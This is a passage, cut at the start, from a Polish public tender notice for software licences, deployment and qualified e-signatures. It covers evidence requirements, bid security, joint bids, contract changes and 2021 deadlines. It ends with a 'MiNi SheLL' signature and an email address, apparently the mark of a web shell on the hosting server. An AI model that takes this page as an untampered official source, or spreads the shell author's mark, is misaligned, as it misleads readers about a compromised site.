odpowiednio w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dokument dotyczy, o udzielenie niezbędnych informacji dotyczących tego dokumentu.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> a) oświadczenie Wykonawcy o tym, że firma wdrożeniowa jest certyfikowanym autoryzowanym partnerem producenta dostarczonego oprogramowania –dotyczy pakietu nr 1<br/>b) certyfikat ISO 9001 lub równoważny – dotyczy pakietu nr 1 <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> a) oświadczenie Wykonawcy o tym, że firma wdrożeniowa jest certyfikowanym autoryzowanym partnerem producenta dostarczonego oprogramowania –dotyczy pakietu nr 1<br/>b) certyfikat ISO 9001 lub równoważny – dotyczy pakietu nr 1<br/>5.13.	Jeżeli Wykonawca nie złoży przedmiotowych środków dowodowych do oferty lub złożone przedmiotowe środki dowodowe są niekompletne, Zamawiający wezwie Wykonawcę do złożenia lub uzupełnienia w wyznaczonym terminie, nie krótszym niż 3 dni od dnia wezwania do przedmiotowych środków dowodowych. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 9.1.	Oferta powinna składać się z następujących dokumentów:<br/>a)	Wypełniony Formularz ofertowy wg załącznika nr 1 do SWZ. Niniejszy Formularz (zał. nr 1 do SWZ) nie podlega uzupełnieniu na zasadach regulowanych przepisami art. 128 ust. 1 UPZP. Wykonawca wypełnia również informacyjnie formularz systemowy (tj. wartości brutto, okres świadczenia asysty powdrożeniowej/ okres ważności kwalifikowanego certyfikatu) na Platformie https://zsm-chorzow.ezamawiajacy.pl/. Wykonawca, składając ofertę informuje Zamawiającego, czy wybór oferty będzie prowadzić do powstania u Zamawiającego obowiązku podatkowego – formularz ofertowy, pkt 2 załącznika nr 1 do SWZ (OPIS SPOSOBU OBLICZANIA CENY pkt 12 ppkt 12.7) SWZ.<br/>b)	Aktualne na dzień składania ofert oświadczenie o braku podstaw wykluczenia oraz spełnianiu warunków udziału w postępowaniu, tymczasowo zastępujące wymagane przez Zamawiającego podmiotowe środki dowodowe – załącznik nr 4 do SWZ – dołączyć do oferty w formie elektronicznej lub postaci elektronicznej opatrzonej podpisem osobistym lub podpisem zaufanym.<br/>c)	Dokumenty i oświadczenia wymienione w pkt 5 SWZ, przy których umieszczono dopisek: „dołączyć do oferty”,<br/>d)	Pełnomocnictwo lub inne dokumenty, z których wynika prawo do podpisania dokumentów składanych wraz z ofertą – jeżeli dotyczy.<br/>e)	Dowód wniesienia wadium w przypadku wniesienia wadium w formie innej niż pieniężna<br/>f)	Zobowiązanie podmiotu/podmiotów udostępniających zasoby, na które Wykonawca będzie się powoływał w celu spełniania warunków udziału w postępowaniu – zgodnie z załącznikiem nr 6 do SWZ (jeżeli dotyczy). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 7.1.	Przystępując do postępowania Wykonawca jest zobowiązany do wniesienia wadium w wysokości uzależnionej od oferowanego pakietu:<br/>Pakiet nr 1– Zakup licencji wraz z dostawą i wdrożeniem zakupionego oprogramowania	6 200,00 zł<br/>Pakiet nr 2 – Zakup kwalifikowanych podpisów elektronicznych wraz z czytnikami oraz oprogramowaniem do obsługi podpisu cyfrowego	400,00 zł<br/>RAZEM: 6 600,00 zł<br/>7.2.	Wadium można wnosić w następujących formach: pieniądzu, gwarancjach bankowych, gwarancjach ubezpieczeniowych, poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (t. j. Dz.U. 2020 poz. 299). <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 4.3. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia:<br/>- Wykonawcy muszą spełniać łącznie warunki określone w pkt 4.2 SWZ<br/>- każdy z Wykonawców samodzielnie jest zobowiązany do wykazania braku podstaw do<br/>wykluczenia w okolicznościach, o których mowa powyżej.<br/>5.24. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców lub gdy<br/>Wykonawca polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby<br/>oświadczenie, o którym mowa w pkt 9.1 b) SWZ składa Wykonawca/każdy spośród<br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia. Oświadczenia te<br/>potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w<br/>zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>5.25. W przypadku gdy Wykonawcy wspólnie ubiegają się o udzielenie zamówienia, Wykonawcy<br/>ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia<br/>albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>Wszelka korespondencja będzie prowadzona przez Zamawiającego wyłącznie z<br/>pełnomocnikiem. Dokument pełnomocnictwa, z treści którego będzie wynikało umocowanie do<br/>reprezentowania w postępowaniu o udzielenie zamówienia tych Wykonawców należy dołączyć<br/>do oferty.<br/>5.26. Jeżeli została wybrana oferta Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia, Zamawiający może żądać przed zawarciem umowy w sprawie zamówienia<br/>publicznego przekazania kopii umowy regulującej współpracę tych Wykonawców.<br/>5.27. Wykonawca, Wykonawca wspólnie ubiegający się o udzielenie zamówienia, podmiot<br/>udostępniający zasoby lub Podwykonawca, podmiotowe środki dowodowe oraz zobowiązanie<br/>podmiotu udostępniającego zasoby, przedmiotowe środki dowodowe, oraz pełnomocnictwo<br/>sporządza w postaci elektronicznej i opatruje kwalifikowanym podpisem elektronicznym,<br/>podpisem zaufanym lub podpisem osobistym W przypadku gdy Wykonawca, Wykonawca<br/>wspólnie ubiegający się o udzielenie zamówienia, podmiot udostępniający zasoby lub<br/>Podwykonawca, podmiotowe środki dowodowe oraz zobowiązanie podmiotu udostępniającego<br/>zasoby, przedmiotowe środki dowodowe, lub pełnomocnictwo, sporządzi jako dokument w<br/>postaci papierowej i opatrzy własnoręcznym podpisem, przekazuje cyfrowe odwzorowanie tego<br/>dokumentu opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub<br/>podpisem osobistym.<br/>Dokumenty te należy wczytać na Platformę: https://zsm-chorzow.ezamawiajacy.pl poprzez<br/>zakładkę Korespondencja., poza zobowiązaniem podmiotu udostępniającego zasoby oraz<br/>przedmiotowymi środkami dowodowymi które należy dołączyć do oferty.<br/>9.5. Wykonawcy wspólnie składający ofertę zobowiązani są przedłożyć dokument ustanawiający<br/>pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia publicznego<br/>albo do reprezentowania ich w postępowaniu i do zawarcia umowy w sprawie zamówienia<br/>publicznego. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Zmiana Umowy dopuszczalna jest w zakresie i na warunkach przewidzianych przepisami ustawy z dnia 11 września 2019 roku – Prawo zamówień publicznych (t.j. Dz.U. 2021 r., poz. 1129).<br/>2.	Zamawiający dopuszcza zmianę umowy w zakresie danych identyfikujących Strony Umowy, takich jak np. firma, adres siedziby lub inne postanowienia dotyczące wskazania stron.<br/>3.	Zamawiający dopuszcza wydłużenie terminu płatności w przypadku zmiany ustawy z dnia 8 marca 2013 r. o przeciwdziałaniu nadmiernym opóźnieniom w transakcjach handlowych (tj. Dz. U. 2021 poz. 424). <br/>4.	Zmiany postanowień Umowy zostaną wyrażone w formie pisemnego aneksu pod rygorem nieważności i mogą nastąpić w następujących sytuacjach:<br/>1)	w przypadku przerwy w pracach spowodowanej działaniem siły wyższej jako zdarzenia zewnętrznego, niemożliwego do przewidzenia i niemożliwego do zapobieżenia,<br/>2)	zmiany obowiązujących przepisów, jeżeli konieczne będzie dostosowanie treści Umowy do aktualnego stanu prawnego,<br/>3)	zaistnienia okoliczności (technicznych, gospodarczych i tym podobnych), których nie można było przewidzieć w chwili zawarcia Umowy (z zastrzeżeniem, że zmiany te nie mogą powodować zmiany terminu zakończenia realizacji Umowy, chyba że wynikać to będzie ze zgody wyrażonej przez Instytucję Zarządzającą Regionalnym Programem Operacyjnym Województwa Śląskiego -dalej w treści: IZ RPOWŚL, ani też wysokości wynagrodzenia, ani obniżenia parametrów technicznych i jakościowych zaoferowanego przedmiotu zamówienia):<br/>a)	zmiana oferowanego przez Wykonawcę oprogramowania w sytuacji, gdy producent (osoba trzecia) nie będzie mógł dostarczyć oferowanego przez Wykonawcę oprogramowania w terminie wyznaczonym w Umowie, a Zamawiający nie będzie mógł przedłużyć terminu realizacji Przedmiotu Zamówienia w związku z koniecznością terminowego wydatkowania środków finansowych (sankcja utraty środków finansowych),<br/>b)	zmiana oferowanego przez Wykonawcę oprogramowania w sytuacji wprowadzenia na rynek przez Wykonawcę lub osobę trzecią nowszej wersji oprogramowania,<br/>c)	zmiana oferowanego przez Wykonawcę oprogramowania w sytuacji ujawnienia się powszechnie występujących wad zaoferowanego oprogramowania,<br/>5)	zmiany oferowanego przez Wykonawcę oprogramowania (wersja), o ile nowe oprogramowanie posiada parametry i właściwości równoważne lub lepsze niż pierwotnie zaoferowane,<br/>6)	zmiany albo rezygnacji z podwykonawcy będącego podmiotem, na którego zasoby Wykonawca powoływał się, na zasadach określonych w UPZP, w celu wykazania spełniania warunków udziału w postępowaniu,<br/>7)	w przypadku przestojów i przypadków zwłoki z przyczyn leżących po stronie Zamawiającego, mających bezpośredni wpływ na termin wykonania przedmiotu umowy, z zastrzeżeniem, że okres przesunięcia terminu nie może być dłuższy niż okres trwania udokumentowanych przestojów i przypadków zwłoki,<br/>8)	zmiana terminu realizacji Przedmiotu Umowy – w sytuacji opóźnienia realizacji innych zamówień komplementarnych realizowanych w ramach Projektu, co uniemożliwi realizację Umowy zgodnie z pierwotnie określonym terminem lub spowoduje, że realizacja Przedmiotu Umowy w pierwotnie ustalonym terminie będzie nieracjonalna technicznie, organizacyjnie lub finansowo. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-09-27 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć na Platformie pod adresem: https://zsmchorzow. ezamawiajacy.pl w zakładce „OFERTY"</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-09-27 09:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-10-26</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com